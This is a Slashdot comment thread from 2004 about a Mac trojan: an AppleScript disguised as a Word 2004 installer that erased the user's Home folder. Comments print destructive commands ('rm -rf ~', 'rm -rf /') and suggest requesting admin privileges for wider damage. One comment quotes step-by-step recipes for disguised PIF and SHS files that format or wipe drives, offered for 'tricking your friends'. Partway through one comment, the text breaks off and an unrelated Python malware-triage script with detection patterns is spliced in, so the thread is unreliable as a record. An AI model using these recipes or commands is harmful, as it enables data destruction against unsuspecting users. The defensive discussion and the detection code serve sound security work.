Mac Trojan Horse Disguised as Word 2004

Espectr0 writes "Macworld is alerting users to a malware program for the Mac. A Macworld reader alerted the magazine to the malware after he downloaded the file from Limewire. The reader told Macworld: 'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy.' However, he added: 'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'" This sounds similar to the recent trojan horse proof-of-concept. There are many ways to make one file look like another, on any platform. This is 2004; you should know by now not to open a file from an untrusted source.
  • by rthille ( 8526 ) <web-slashdot@@@rangat...org> on Wednesday May 12, 2004 @04:01PM (#9131253) Homepage Journal

    This is a perfect use for Fast User Switching. Create an account with no perms and no data you care about losing. Test downloads in that account. You can do it without even logging out.

    Be careful though of the fact that there's no restriction on network access for a 'no perms' account. (This is a failing of UNIX in general, not MacOS in particular.) This would allow Microsoft/anyone to put out a trojan like this, and send back a 'this IP fell for it' packet, or even run a server on a 'high' port (depending on your firewall configuration).
  • by Trigun ( 685027 ) <evil@evil e m p i r e . a t h .cx> on Wednesday May 12, 2004 @04:01PM (#9131257)
    Anyone know if a Mac comes with strings or a similar program?

    Always helpful when downloading off the net.
  • by Isbiten ( 597220 ) <isbiten@gmail. c o m> on Wednesday May 12, 2004 @04:07PM (#9131381) Homepage
    Evilly stolen from robg Link [macosxhints.com]

    After reading the article and the press release, I think it's pretty obvious what the program is doing -- I suspect it's nothing more than a one-line AppleScript. Although some (perhaps many) will disagree with me, I'm going to publish what I think the exploit to be, because it's not a huge secret. Basically, my guess is that the trojan horse is a one-line AppleScript that contains the following UNIX command (in the script, the command will be accessed via the AppleScript method for calling a shell command, but I'm not going to bother including that part here):

    rm -rf ~

    WARNING!! DO NOT USE THIS COMMAND! YOU WILL ERASE YOUR USER'S DIRECTORY!

    I feel it's important that everyone understand the above command, and know what it looks like -- the more people who know what this line does and how it works, hopefully the fewer who will be fooled by it. And to claim that this is some "deep dark secret" that needs to be hidden is, in my opinion, trying to hide from the truth -- more "security by obscurity," which we all know doesn't work well at all. rm -rf is a very standard, very useful Unix command. In fact, if you search macosxhints (using the advanced search page) for the 'exact phrase' rm -rf, you'll get fully three pages of matches.

    What makes it troublesome in this case is simply that it's called from a program where the typical user will not know what's happening, and will be shocked at the outcome. But listing the command is not like explaining how to write a self-replicating virus that spreads from machine to machine -- this is common knowledge to probably at least a couple of million OS X users who have some knowledge of Unix.

    For those that don't know Unix, rm is "move to and empty trash," -r is "do this for all items and folders within this folder," the f means "force removal without confirmation," and the ~ means "the user's directory." Spelled out, this means that the script will, without warning or user intervention, delete everything in the user's folder. Permanently.

    The Intego press release explains one way to test a program if you suspect it might be a trojan horse -- select it, do a Get Info, and try to delete the icon. Here's another safety check that I often use myself: drag and drop the program onto Script Editor (or control-click on a package and select Show Package Contents to explore the package contents if it's a package installer). If you're lucky, and the script writer was somewhat lazy (by not making the script uneditable), the script itself will open for editing.

    So now that you know about this trojan horse, the question is, what should be done about them on OS X? My first thought on reading the article was "Cool, Darwin at work on the peer to peer networks!" But then, I considered some additional scenarios which may have more applicability in the real world. The current example is likely to remain on Gnutella, given that it's a program that purports to install the currently 'hot' application, the new Office suite. However, think about this version: A useful AppleScript that does something cool (change type/creator codes, backs up your directory, etc.). However, buried in the code is a timer that counts the number of times you've used the program. On the 50th run, it deletes your entire user's folder. Or worse, it pops up a dialog that says "In order to backup the Foo_bar file, we need your admin password." It may then be possible (I'm not quite sure how) for the app to delete the entire hard drive, instead of just your user's folder. If the script were useful enough, it could be very widely distributed, and then go blam! at some non-specified time in the future.

    What, if anything, should Apple do about this? Note that this is not specific to OS X; it's really a 'social engineering' exploit. I think it would be just as easy to write a similar 'exploit' for Linux or even Windows, given that it's a simple script that relies
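The two checks robg describes above (look inside the package rather than trusting the icon, and look for a shell command hidden in an AppleScript applet), together with Trigun's question about `strings` on the Mac, can be automated for triage before anything is double-clicked. The following script is an added example, not code from the Slashdot thread, from robg, or from Intego. It assumes the usual bundle layout (`Contents/Info.plist`, and `Contents/Resources/Scripts/main.scpt` for an AppleScript applet); the sample bundle it builds is constructed in a temporary directory and is not a real applet.

```python
"""Triage a downloaded .app bundle without launching it.

Added example for the discussion above (not the thread's own code).
Assumptions: a bundle keeps its metadata in Contents/Info.plist and an
AppleScript applet keeps its compiled script in
Contents/Resources/Scripts/main.scpt.
"""
import os
import plistlib
import re
import tempfile

# Shell fragments a defender wants flagged inside a supposed "Word installer".
DANGEROUS = {
    "recursive delete of an absolute path or the home directory":
        re.compile(rb"rm\s+-[a-zA-Z]*r[a-zA-Z]*\s+(~|\$HOME|/)"),
    "shell escape from AppleScript":
        re.compile(rb"do shell script"),
    "asks for admin password":
        re.compile(rb"with administrator privileges"),
}


def strings(data, min_len=4):
    """Minimal clone of the Unix `strings` tool: runs of printable ASCII."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def inspect_bundle(bundle):
    """Report what a bundle really is and which suspicious strings it carries."""
    contents = os.path.join(bundle, "Contents")
    report = {"is_applet": False, "executable": None, "findings": []}

    info = os.path.join(contents, "Info.plist")
    if os.path.isfile(info):
        with open(info, "rb") as fp:
            report["executable"] = plistlib.load(fp).get("CFBundleExecutable")

    # An "installer" whose executable is the generic applet stub, or which
    # ships a main.scpt, is an AppleScript applet regardless of its icon.
    main_scpt = os.path.join(contents, "Resources", "Scripts", "main.scpt")
    report["is_applet"] = os.path.isfile(main_scpt) or report["executable"] == "applet"

    # Run the strings heuristic over every file in the bundle.
    for root, _dirs, files in os.walk(contents):
        for name in files:
            path = os.path.join(root, name)
            with open(path, "rb") as fp:
                data = fp.read()
            for s in strings(data):
                for label, pattern in DANGEROUS.items():
                    if pattern.search(s):
                        report["findings"].append(
                            (os.path.relpath(path, bundle), label, s.decode("ascii")))

    report["suspicious"] = bool(report["findings"])
    return report


def build_sample_bundle(malicious):
    """Constructed sample bundle (hypothetical, not a real compiled applet)."""
    bundle = os.path.join(tempfile.mkdtemp(), "Microsoft Word 2004.app")
    script_dir = os.path.join(bundle, "Contents", "Resources", "Scripts")
    os.makedirs(script_dir)
    with open(os.path.join(bundle, "Contents", "Info.plist"), "wb") as fp:
        plistlib.dump({"CFBundleExecutable": "applet",
                       "CFBundleName": "Microsoft Word 2004"}, fp)
    # Stand-in for a compiled script: binary noise around the source text.
    payload = b'do shell script "rm -rf ~"' if malicious else b'display dialog "Hello"'
    with open(os.path.join(script_dir, "main.scpt"), "wb") as fp:
        fp.write(b"\x00\x01\x00\x00" + payload + b"\x00")
    return bundle


if __name__ == "__main__":
    for flag in (True, False):
        report = inspect_bundle(build_sample_bundle(flag))
        print("applet:", report["is_applet"], "executable:", report["executable"])
        for finding in report["findings"]:
            print("  ", finding)
        print("verdict:", "suspicious" if report["suspicious"] else "nothing found")
```

A compiled `.scpt` is a binary blob, so the `strings` pass is a heuristic rather than proof; a script whose text is stored in a non-ASCII encoding, or a native binary that builds the command at run time, slips past it. The structural check (executable is the applet stub, or a `main.scpt` is present, while the icon says "installer") does not depend on the payload and is the part worth trusting; opening the script in Script Editor, as robg describes, remains the definitive check.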
  • by Rick Zeman ( 15628 ) on Wednesday May 12, 2004 @04:07PM (#9131392)
    This is just a case of assigning a different icon to an application. Could be as simple as an rm -rf / shell script with a word icon.

    That's exactly what it is. An Applescript calling rm -rf in a shell script with an MS icon on the Applescript applet. But, since it's UNIX, not windows, the only damage is self-inflicted by default.
    Now if the writer was mo' clever, he could have added authentication ("with administrator privileges") so the stupid person could have totally eradicated himself after supplying the administrator password.
  • by daveschroeder ( 516195 ) * on Wednesday May 12, 2004 @04:08PM (#9131399)
    From the read me:

    Trojan Example Read Me

    This is an EXAMPLE of an AppleScript with a custom icon. It does nothing malicious. It does not spread. It does not delete files. It speaks and displays some dialog boxes. It's merely poking fun at Intego's sensationalist handling of these issues on Mac OS X, and their claims that these represent serious flaws in Mac OS X.

    I wonder if Intego will protect against, and describe, this trojan...?

    Perhaps they can make another press release hawking VirusBarrier.

    For more information:

    das@doit.wisc.edu


    Available at:

    http://mirror.services.wisc.edu/mirrors/tmp/ [wisc.edu]

    The "trojan" is an AppleScript that speaks the text: "Muhahahaha. You have been owned by this elite trojan. Just kidding." It then displays a series of dialog boxes:

    1. "OMG! it's another trojan for Mac OS X! Will Intego have to protect against this one too?"

    2. "Intego's irresponsible sensationalism about non-issues is quite astounding."

    3. "They make wild claims about 'serious weaknesses' in Mac OS X that simply aren't true, for the sake of hawking their product."

    4. "AppleScripts and fake MP3s do not, nor will they ever, rise to the level of the mind-boggling number of completely remote exploits for Windows, requiring absolutely no user interaction, that plague millions of computers and cost billions of dollars of lost productivity."

    5. "Mac OS X is intrinsically and fundamentally more secure, and more open to peer and community review."

    6. "Social engineering problems, such as tricking a user into launching a fake Word installer that's really an AppleScript downloaded from a P2P network, don't reveal 'serious weaknesses' in Mac OS X."

    7. "Intego would be well suited to selling snake oil at a two-bit carnival."

    It then quits.

    It has Intego's VirusBarrier X installer icon, and is named "VirusBarrier X Install.app".

    (Note: this package is CLEARLY labeled as an example, and comes with a read me.)
  • To Quote Nelson.. (Score:2, Interesting)

    by Dynamoo ( 527749 ) on Wednesday May 12, 2004 @04:09PM (#9131433) Homepage
    To quote Nelson Muntz [snpp.com].. Ha-HA! Poor saps like me who always wince under the smugness of Mac users when our networks are wiped off the face of the earth by some script kiddie every month at least get a little light relief.

    Seriously though, even relatively small user populations are vulnerable to trojans and worms. The Witty Worm (see this analysis [caida.org]) indicates that non-Windows users are just as vulnerable a target - Witty infected almost 100% of the vulnerable worldwide population of 12,000 or so machines in about an hour. In other words, Mac (and Linux) users need to take the same precautions as those of us who are saddled with bloody Windows do.

  • "This being 2004..." (Score:4, Interesting)

    by ChiralSoftware ( 743411 ) <info@chiralsoftware.net> on Wednesday May 12, 2004 @04:11PM (#9131462) Homepage
    "This being 2004, you should know not to open a file from an untrusted source." WRONG! This is exactly the mindset that has resulted in the security problems that plague computers today. Operating environments should have the ability to fully contain and isolate any process. Operating environments should have the ability to run hostile code with complete safety. The smart thing to do is to start regarding ALL code as hostile. One side effect of that is that failures of non-hostile code will be contained, too, making for a more reliable system.

    How can such a goal be attained? There are many ways available now. The most obvious one is a VM system with security policies, such as the JVM. That's not the only one, though. Another method is a capabilities [eros-os.org]-based system, so when a process starts, it has only a defined set of capabilities to work with. OpenBSD [openbsd.org] has a similar, but more limited system called systrace. The TrustedBSD [trustedbsd.org] project and SELinux [nsa.gov] have similar aims, and SELinux is being integrated into mainstream Linux distros. Another way to run untrusted things is with user-mode Linux [sourceforge.net], which I believe is integrated with Linux 2.6.

    The editor is right, though, that on currently-used systems like OSX and MS Windows, you have to be careful what you click on. But the problem is that we have come to accept that as "the way things are", when there is no reason for that to be the case. You should be able to run hostile code, see what it does, laugh at it, and delete it without any harm. The technology to do that exists, and has existed for years, but we have come to accept broken products and systems that don't allow that.

    ---------
    WAP news [chiralsoftware.net]

  • Shell script? (Score:2, Interesting)

    by imidazole2 ( 776413 ) on Wednesday May 12, 2004 @04:16PM (#9131567) Homepage Journal
    That's just as lame as me writing a shell script to run a command to delete tons of stuff, and making it larger to look like it's a real program! Why does crap like this get put on Slashdot?
  • by urmensch ( 314385 ) <ectogon <ata> hotmial> on Wednesday May 12, 2004 @04:31PM (#9131787)
    To be fair, a lot of windows users don't understand the difference either.

    A client I worked for couldn't deal with two mdb files on her desktop. It confused her that she could work with two databases independently, because to her, they were both just "Access".

    Cheers to the lusers!
  • Social engineering (Score:3, Interesting)

    by amichalo ( 132545 ) on Wednesday May 12, 2004 @04:32PM (#9131800)
    So this trojan was from 'Word 2004'... a decent one to pick because it recently started shipping.

    What other apps are good targets for trojan horses? I have always been afraid of downloading a 'virus scanner' because it just screams 'I have no virus scanner on my computer!'

    Others you have noticed? Perhaps a 'digital wallet' application to keep credit cards, passwords, etc. in :)
  • by SphericalCrusher ( 739397 ) on Wednesday May 12, 2004 @04:38PM (#9131886) Journal
    I have another: Who dubbed this thing a Trojan Horse? Trojan Horses do not wipe out Home folders... they only sit dormant and collect information. I think it was a virus that this guy downloaded, not a Trojan.
  • by Anonymous Coward on Wednesday May 12, 2004 @04:43PM (#9131981)
    ...is the old verity about how difficult it is to scam an honest man. The ones who are looking for something more than they deserve are easy pickings.
  • by argent ( 18001 ) <peter@slashdot.2 ... m ['.ta' in gap]> on Wednesday May 12, 2004 @05:22PM (#9132466) Homepage Journal
    The Mac doesn't (yet) have the plethora of mechanisms that viruses on Microsoft platforms use to automatically launch themselves, but the good old human engineering attack will work on anything. Back in 1980 at Berkeley people would stick prank files in their home directory with names like "advent450" to make people think they were enhanced versions of the old "Colossal Cave" adventure (which was undergoing frantic expansion at Berkeley at the time) and run them...

    It's like the Warlock in Niven's "The Magic Goes Away": the thing about being a magician is everyone expects you to use magic, but a dagger always works. No operating system can keep someone from explicitly unpacking and executing a file.

    So, no, the Mac is definitely not immune, but the rate of virus propagation on the Mac should be limited by the need for people to deliberately unpack and run the infected file. What makes virus propagation on Windows so rapid is the way they've integrated the browser and the desktop, which means that they have to block potential exploits one by one. Apple's web integration is not nearly so complete, though they're beginning to do things that I find dubious as they start getting feature-crazy with Safari...

    Of course when I tell people they probably want to turn off "automatically open safe attachments" in their browser, just in case, they come back with this argument that the Mac is immune to viruses. Well, yes, it's at least resistant... but that's only because there aren't many things like "automatically open safe attachments" for viruses to take advantage of.

    Yet.
  • Free Software (Score:3, Interesting)

    by krmt ( 91422 ) <therefrmhere AT yahoo DOT com> on Wednesday May 12, 2004 @05:53PM (#9132780) Homepage
    When people ask me why I use Linux, one of the things I always say is "I never have to pirate software anymore." Everyone ignores it, but this story demonstrates why I always mention it. When you don't have to pirate software, you don't have to worry that some program that you need but can't afford or don't want to pay for is going to destroy your system. All my stuff comes from a much more trusted source than Limewire.

    Everyone I know who uses Windows and pirates software like this has to put up with this shit. It's just not worth it, especially when you just want to get your work done. Of course, in these days where you plug your machine in and you get a host of infections automatically within a 24 hour timespan perhaps no one really worries as much about these things anymore.
  • by 0x0d0a ( 568518 ) on Wednesday May 12, 2004 @09:11PM (#9134747) Journal
    This was a person who based a choice on whether or not to run an app based on how the ICON looked. They will repeat over and over and over again and wonder why the hell their shit keeps breaking.

    And what methodology do you use to ensure that your software is safe, I have to ask? Really, there are no good generally-available methods of avoiding such trojans.

    I think I'm reasonably competent at determining whether something's a trojan, compared to most folks. I've been known to strings binaries, to disassemble and do raw code analysis, to use various debugging tools, and to run things chrooted. I generally stick with free open source software only. However, in all honesty, there are no real strong protection mechanisms available. It's not very difficult to produce a trojan that will get past these barriers.

    The problem is that people look at the statement "the icon looked legitimate" and think "hey, that isn't a good method to use to check the legitimacy of something" and immediately (and illogically) jump to "and I could do better".

    There's no real reason to ridicule the guy.
  • by cyril3 ( 522783 ) on Wednesday May 12, 2004 @10:19PM (#9135226)
    there are no good generally-available methods of avoiding such trojans.

    But even the bad ones are better than 'Gee, the Icon looks pretty. Virus writers are notoriously bad artists so this program I downloaded from some unknown person that claims to be a secret beta of a Microsoft product should be fine to run'

    How's this for a logical jump.

    Hey, that isn't a good method to use to check the legitimacy of something

    so

    I'll ring my aged grandmother and ask her should I run it and she'll say "Don't be stupid, running software like that you could catch one of those virus thingys that are running around these days" (She has a 50% chance of being right)

    and that would be better than looking at the freaking ICON.

  • Easy Pie... (Score:3, Interesting)

    by firew0lfz ( 690262 ) on Wednesday May 12, 2004 @10:28PM (#9135299)
    On the note about the whole making the Icon look like the real thing... uhm guys, can't you do this just as easy as in Windows?

    Here is a link to get you guys started on tricking your friends into formatting their hard drives:
    http://lockdowncorp.com/hackertricks.html

    From that page:
    "Dangerous Commands That Can Be Embedded

    PIF Shortcut Extensions

    Some hidden file extensions can easily be programmed with hidden commands that could do damage to your system. Following is a simple test:

    1. Right click your mouse on your desktop and select New and then ShortCut
    2. In the command line type: format a: /autotest
    3. Click Next
    4. In the "Select a name for the shortcut" area type: readme.txt
    5. Click Next
    6. Select a notepad icon and click Finish

    You now have a file on your desktop called readme.txt with a notepad icon. Make sure there is a disk in your drive that you do not mind being wiped and click on the icon. The file that you click on will do a format on the disk in the A: drive. Of course, the hacker's icon would target another drive, or maybe have a name such as 'game.exe' and with a command to delete your Windows directory or (deltree /y c:\*.*) your entire C drive!

    If the PIF extension were not hidden, this would not be able to fool you."

    Or, you could also do the following:

    "SHS Extensions

    Scrap files can also hide embedded commands. Following is a simple test:

    1. Make a copy of notepad.exe and put it on your desktop.
    2. Open Wordpad
    3. Click and drag notepad.exe into the open wordpad document.
    4. Click on Edit and select Package Object, then select Edit Package
    5. Click on Edit and then Command Line
    6. Type a command in the box such as format a: /autotest and click on Ok
    7. The Icon can also be changed from this edit window
    8. Exit from the edit window and it will update the document
    9. Click and drag notepad back to the desktop
    10. Rename the file that it created (Scrap) to Readme.txt

    You now have what will look like a text file. If it is run it will format the disk in the A: drive. As seen in the example above for PIF Shortcut Extensions, the hacker could use more dangerous commands."

    Various other types of info available there. Enjoy.

  • No (Score:2, Interesting)

    by Dr. q00p ( 714993 ) on Thursday May 13, 2004 @05:00AM (#9137030)
    "UNIX was designed to run on mainframes and serve dozens, hundreds or even thousands of users."

    Actually, UNIX was designed to run as a game platform on a PDP-7 minicomputer. :)

    From Origins and History of Unix [faqs.org]
    "Unix began its life on a scavenged PDP-7 minicomputer[14] like the one shown in Figure 2.1, as a platform for the Space Travel game and a testbed for Thompson's ideas about operating system design."
